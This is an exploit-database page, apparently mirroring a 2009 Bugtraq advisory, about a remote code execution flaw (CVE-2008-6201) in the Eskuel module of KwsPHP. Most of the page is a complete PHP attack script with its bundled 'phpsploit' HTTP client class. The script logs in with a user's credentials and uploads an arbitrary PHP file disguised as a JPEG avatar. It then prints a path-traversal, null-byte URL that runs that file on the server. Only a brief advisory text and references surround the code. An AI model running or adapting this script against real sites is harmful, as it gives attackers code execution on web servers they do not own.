|
Feeds -
Exploits
|
|
Written by TsukasaGenesis && Ajax
|
|
Wednesday, 04 March 2009 22:14 |
KwsPHP Eskuel Module Arbitrary File Upload Vulnerability
-\\Bugtraq ID:
28788
-\\Class:
Input Validation Error
-\\CVE:
CVE-2008-6201
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Apr 15 2008 12:00AM
-\\Updated:
Mar 04 2009 02:16PM
-\\Credit:
TsukasaGenesis && Ajax
-\\Vulnerable:
KwsPHP KwsPHP 1.3.456
KwsPHP KwsPHP 1.0
-\\Discussion
The Eskuel module for KwsPHP is prone to a vulnerability that lets remote attackers upload and execute arbitrary code because the application fails to sanitize user-supplied input.
An attacker can leverage this issue to execute arbitrary code on an affected computer with the privileges of the webserver process.
Note that to exploit this issue, the attacker may require valid login credentials.
This issue affects KwsPHP 1.3.456; prior versions may also be affected.
-\\Exploit(s)/PoC(s):
Attackers may exploit this issue through a browser.
The following exploit code is available:
===============================================================
28788.php
^^^^^^^^^^
<?php
/*
---KwsPHP All Version / Remote Code Execution---
Faille Discovered By TsukasaGenesis && Ajax
Sploit Coded By Ajax Site: http://www.r57shell.in
*/
if($argc<9){
print "---KwsPHP All Version / Remote Code Execution---\n\n";
print "usage: kwsphpsploit.php -url <url> -login <login> -pass <pass> -email <email> -file <file> [-id <id>]\n\n";
print "Url url of KwsPHP script : Ex : www.example.com/kwsphp/\n";
print "Login your account's login ( need to be allow to upload )\n";
print "Pass account's password\n";
print "Email account's email\n";
print "File PHP script upload and execute\n";
print "Id account'id\n\n";
exit();
}
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
}
if($opt) exit("\n-$param parameter required");
else return;
}
$url = getparam("url",1);
$login = getparam("login",1);
$pass = getparam("pass",1);
$email = getparam("email",1);
$file = getparam("file",1);
$id = getparam("id");
$source = @file_get_contents($file);
if(strlen($source)<2){ exit("$file don't exist.\n"); }
$xpl = new phpsploit();
$s = $xpl->post($url."/index.php?","sql_pseudo=$login&sql_pass=$pass");
//Cookies
if(preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i",$s,$phpsessid) && !preg_match("#name=\"sql_pseudo\"#i",$s)){
$xpl->addcookie("PHPSESSID",$phpsessid[1]);
$xpl->addcookie("sql_pseudo",$login);
$xpl->addcookie("sql_pass",md5($pass));
$xpl->addcookie("auto","off");
print "[*] PHPSESSID : $phpsessid[1]\n";
}
else{ exit("[*] Can't log in\n"); }
//Id
if(!isset($id)){
preg_match("#id=([0-9]+)\" title=\"Voir son profil\">".$login."<\/a>#i",$s,$id_member);
$id = $id_member[1];
}
print "[*] Id : $id\n";
//Upload
$formdata = array(frmdt_url => $url.'/index.php?mod=espace_membre&ac=profil',
'action' => 'modifier',
'ok' => '1',
'id' => $id,
'pseudo' => $login,
'sql_newNom' => $login,
'sql_newMail' => $email,
'MAX_FILE_SIZE' => '2097152',
'valider' => ' Modifier mon profil',
'userfile[]' => array(
frmdt_type => 'image/jpeg',
frmdt_filename => 'test.jpg',
frmdt_content => $source));
$xpl->formdata($formdata);
print "[*] Upload finish.\n";
$url = $url."/eskuel/help.php?action=../../../images/avatars/upload/".$id.".jpg%00";
print "[*] Exploit Sucess !\n";
print "[*] The code can be run here : \nhttp://" . $url . "\n";
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PhpSploit Class
* REQUIREMENTS: PHP 4 / PHP 5
* VERSION: 2.0
* LICENSE: GNU General Public License
* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
* FILENAME: phpsploitclass.php
*
* CONTACT:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
(french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
* headers) of the request. Others useful functions can be used for debugging.
* A manual is actually in development but to know how to use it, you can
* read the comments.
*
* CHANGELOG:
*
* [2007-06-10] (2.0)
* * Code: Code optimization
* * New: Compatible with PHP 4 by default
*
* [2007-01-24] (1.2)
* * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
* * New: multipart/form-data enctype is now supported
*
* [2006-12-31] (1.1)
* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
* * New: You can now call the getheader() / getcontent() function without parameters
*
* [2006-12-30] (1.0)
* * First version
*
*/
class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
var $url;
var $packet;
var $proxyuser;
var $proxypass;
var $header;
var $cookie;
var $data;
var $boundary;
var $allowredirection;
var $last_redirection;
var $cookiejar;
var $recv;
var $cookie_str;
var $header_str;
var $server_content;
var $server_header;
/**
* This function is called by the
* get()/post()/formdata() functions.
* You don't have to call it, this is
* the main function.
*
* @access private
* @return string $this->recv ServerResponse
*
*/
function sock()
{
if(!empty($this->proxyhost) && !empty($this->proxyport))
$socket = @fsockopen($this->proxyhost,$this->proxyport);
else
$socket = @fsockopen($this->host,$this->port);
if(!$socket)
die("Error: Host seems down");
if($this->method=='get')
$this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
elseif($this->method=='post' or $this->method=='formdata')
$this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
else
die("Error: Invalid method");
if(!empty($this->proxyuser))
$this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
if(!empty($this->header))
$this->packet .= $this->showheader();
if(!empty($this->cookie))
$this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
$this->packet .= 'Host: '.$this->host."\r\n";
$this->packet .= "Connection: Close\r\n";
if($this->method=='post')
{
$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data."\r\n";
}
elseif($this->method=='formdata')
{
$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data;
}
$this->packet .= "\r\n";
$this->recv = '';
fputs($socket,$this->packet);
while(!feof($socket))
$this->recv .= fgets($socket);
fclose($socket);
if($this->cookiejar)
$this->getcookie();
if($this->allowredirection)
return $this->getredirection();
else
return $this->recv;
}
/**
* This function allows you to add several
* cookies in the request.
*
* @access public
* @param string cookn CookieName
* @param string cookv CookieValue
* @example $this->addcookie('name','value')
*
*/
function addcookie($cookn,$cookv)
{
if(!isset($this->cookie))
$this->cookie = array();
$this->cookie[$cookn] = $cookv;
}
/**
* This function allows you to add several
* headers in the request.
*
* @access public
* @param string headern HeaderName
* @param string headervalue Headervalue
* @example $this->addheader('Client-IP', '128.5.2.3')
*
*/
function addheader($headern,$headervalue)
{
if(!isset($this->header))
$this->header = array();
$this->header[$headern] = $headervalue;
}
/**
* This function allows you to use an
* http proxy server. Several methods
* are supported.
*
* @access public
* @param string proxy ProxyHost
* @param integer proxyp ProxyPort
* @example $this->proxy('localhost',8118)
* @example $this->proxy('localhost:8118')
*
*/
function proxy($proxy,$proxyp='')
{
if(empty($proxyp))
{
$proxarr = explode(':',$proxy);
$this->proxyhost = $proxarr[0];
$this->proxyport = (int)$proxarr[1];
}
else
{
$this->proxyhost = $proxy;
$this->proxyport = (int)$proxyp;
}
if($this->proxyport > 65535)
die("Error: Invalid port number");
}
/**
* This function allows you to use an
* http proxy server which requires a
* basic authentification. Several
* methods are supported:
*
* @access public
* @param string proxyauth ProxyUser
* @param string proxypass ProxyPass
* @example $this->proxyauth('user','pwd')
* @example $this->proxyauth('user:pwd');
*
*/
function proxyauth($proxyauth,$proxypass='')
{
if(empty($proxypass))
{
$posvirg = strpos($proxyauth,':');
$this->proxyuser = substr($proxyauth,0,$posvirg);
$this->proxypass = substr($proxyauth,$posvirg+1);
}
else
{
$this->proxyuser = $proxyauth;
$this->proxypass = $proxypass;
}
}
/**
* This function allows you to set
* the 'User-Agent' header.
*
* @access public
* @param string useragent Agent
* @example $this->agent('Firefox')
*
*/
function agent($useragent)
{
$this->addheader('User-Agent',$useragent);
}
/**
* This function returns the headers
* which will be in the next request.
*
* @access public
* @return string $this->header_str Headers
* @example $this->showheader()
*
*/
function showheader()
{
$this->header_str = '';
if(!isset($this->header))
return;
foreach($this->header as $name => $value)
$this->header_str .= $name.': '.$value."\r\n";
return $this->header_str;
}
/**
* This function returns the cookies
* which will be in the next request.
*
* @access public
* @return string $this->cookie_str Cookies
* @example $this->showcookie()
*
*/
function showcookie()
{
$this->cookie_str = '';
if(!isset($this->cookie))
return;
foreach($this->cookie as $name => $value)
$this->cookie_str .= $name.'='.$value.'; ';
return $this->cookie_str;
}
/**
* This function returns the last
* formed http request.
*
* @access public
* @return string $this->packet HttpPacket
* @example $this->showlastrequest()
*
*/
function showlastrequest()
{
if(!isset($this->packet))
return;
else
return $this->packet;
}
/**
* This function sends the formed
* http packet with the GET method.
*
* @access public
* @param string url Url
* @return string $this->sock()
* @example $this->get('localhost/index.php?var=x')
* @example $this->get('http://localhost:88/tst.php')
*
*/
function get($url)
{
$this->target($url);
$this->method = 'get';
return $this->sock();
}
/**
* This function sends the formed
* http packet with the POST method.
*
* @access public
* @param string url Url
* @param string data PostData
* @return string $this->sock()
* @example $this->post('http://localhost/','helo=x')
*
*/
function post($url,$data)
{
$this->target($url);
$this->method = 'post';
$this->data = $data;
return $this->sock();
}
/**
* This function sends the formed http
* packet with the POST method using
* the multipart/form-data enctype.
*
* @access public
* @param array array FormDataArray
* @return string $this->sock()
* @example $formdata = array(
* frmdt_url => 'http://localhost/upload.php',
* frmdt_boundary => '123456', # Optional
* 'var' => 'example',
* 'file' => array(
* frmdt_type => 'image/gif', # Optional
* frmdt_transfert => 'binary' # Optional
* frmdt_filename => 'hello.php,
* frmdt_content => '<?php echo 1; ?>'));
* $this->formdata($formdata);
*
*/
function formdata($array)
{
$this->target($array[frmdt_url]);
$this->method = 'formdata';
$this->data = '';
if(!isset($array[frmdt_boundary]))
$this->boundary = 'phpsploit';
else
$this->boundary = $array[frmdt_boundary];
foreach($array as $key => $value)
{
if(!preg_match('#^frmdt_(boundary|url)#',$key))
{
$this->data .= str_repeat('-',29).$this->boundary."\r\n";
$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
if(!is_array($value))
{
$this->data .= "\r\n\r\n".$value."\r\n";
}
else
{
$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
if(isset($array[$key][frmdt_type]))
$this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
if(isset($array[$key][frmdt_transfert]))
$this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
}
}
}
$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
return $this->sock();
}
/**
* This function returns the content
* of the server response, without
* the headers.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_content
* @example $this->getcontent()
* @example $this->getcontent($this->get('http://localhost/'))
*
*/
function getcontent($code='')
{
if(empty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_content = '';
for($i=1;$i<count($code);$i++)
$this->server_content .= $code[$i];
return $this->server_content;
}
/**
* This function returns the headers
* of the server response, without
* the content.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_header
* @example $this->getcontent()
* @example $this->getcontent($this->post('http://localhost/','1=2'))
*
*/
function getheader($code='')
{
if(empty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_header = $code[0];
return $this->server_header;
}
/**
* This function is called by the
* cookiejar() function. It adds the
* value of the "Set-Cookie" header
* in the "Cookie" header for the
* next request. You don't have to
* call it.
*
* @access private
* @param string code ServerResponse
*
*/
function getcookie()
{
foreach(explode("\r\n",$this->getheader()) as $header)
{
if(preg_match('/set-cookie/i',$header))
{
$fequal = strpos($header,'=');
$fvirgu = strpos($header,';');
// 12=strlen('set-cookie: ')
$cname = substr($header,12,$fequal-12);
$cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
$this->cookie[trim($cname)] = trim($cvalu);
}
}
}
/**
* This function is called by the
* get()/post() functions. You
* don't have to call it.
*
* @access private
* @param string urltarg Url
* @example $this->target('http://localhost/')
*
*/
function target($urltarg)
{
if(!ereg('^http://',$urltarg))
$urltarg = 'http://'.$urltarg;
$urlarr = parse_url($urltarg);
$this->url = 'http://'.$urlarr['host'].$urlarr['path'];
if(isset($urlarr['query']))
$this->url .= '?'.$urlarr['query'];
$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
$this->host = $urlarr['host'];
if($this->port != '80')
$this->host .= ':'.$this->port;
if(!isset($urlarr['path']) or empty($urlarr['path']))
die("Error: No path precised");
$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
if($this->port > 65535)
die("Error: Invalid port number");
}
/**
* If you call this function,
* the script will extract all
* 'Set-Cookie' headers values
* and it will automatically add
* them into the 'Cookie' header
* for all next requests.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->cookiejar(0)
* @example $this->cookiejar(1)
*
*/
function cookiejar($code)
{
if($code=='0')
$this->cookiejar=FALSE;
elseif($code=='1')
$this->cookiejar=TRUE;
}
/**
* If you call this function,
* the script will follow all
* redirections sent by the server.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->allowredirection(0)
* @example $this->allowredirection(1)
*
*/
function allowredirection($code)
{
if($code=='0')
$this->allowredirection=FALSE;
elseif($code=='1')
$this->allowredirection=TRUE;
}
/**
* This function is called if
* allowredirection() is enabled.
* You don't have to call it.
*
* @access private
* @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
* @return string $this->get($this->last_redirection)
* @return string $this->recv;
*
*/
function getredirection()
{
if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
{
$this->last_redirection = trim($codearr[2]);
if(!ereg('://',$this->last_redirection))
return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
else
return $this->get($this->last_redirection);
}
else
return $this->recv;
}
/**
* This function allows you
* to reset some parameters.
*
* @access public
* @param string func Param
* @example $this->reset('header')
* @example $this->reset('cookie')
* @example $this->reset()
*
*/
function reset($func='')
{
switch($func)
{
case 'header':
$this->header = array();
break;
case 'cookie':
$this->cookie = array();
break;
default:
$this->cookiejar = '';
$this->header = array();
$this->cookie = array();
$this->allowredirection = '';
break;
}
}
}
?>
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--KwsPHP Homepage
http://koogar.alorys-hebergement.com/kwsphp/index.ph (KwsPHP)
--KwsPHP (Upload) Remote Code Execution Exploit
http://www.securityfocus.com/archive/1/49086 (
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
)
|
|
